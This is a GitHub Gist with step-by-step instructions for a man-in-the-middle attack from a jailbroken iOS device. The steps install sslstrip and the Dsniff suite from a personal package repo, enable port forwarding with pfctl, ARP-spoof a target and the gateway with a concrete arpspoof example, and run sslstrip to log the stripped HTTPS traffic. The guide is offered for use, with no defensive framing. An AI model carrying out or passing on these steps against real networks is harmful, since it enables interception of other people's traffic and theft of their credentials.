Skip to content

Instantly share code, notes, and snippets.

@Starwarsfan2099
Last active June 11, 2023 23:50
Show Gist options
  • Save Starwarsfan2099/7424d3033850f4cff3bdb38763289d95 to your computer and use it in GitHub Desktop.
Save Starwarsfan2099/7424d3033850f4cff3bdb38763289d95 to your computer and use it in GitHub Desktop.
  1. Ok, so first add this repo: www.starwarsfan2099.x10host.com/repo
  2. Install the package Sslstrip. It should also install python 2.7, Twisted, pyopenssl, and zope.interface as dependancies.
  3. Install Dsniff Suite for arpspoof.
  4. Install the Port Forwarding package.
  5. Ok, so open up mobile terminal and to enable port forwarding, run this command: pfctl -e -f /etc/pf_ssl.conf.
  6. In the same window go ahead and start arpspoof. (example, arpspoof -i en0 -t 192.168.254.46 192.168.254.254 so arpspoof -i (interface) -t (target) (gateway).
  7. Make sure thats running and than go to the second window and type sslstrip.
  8. Done!!! it should produce some output in 20 seconds and saves everything to sslstrip.log in the current directory. Let me know if you have any problems!
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment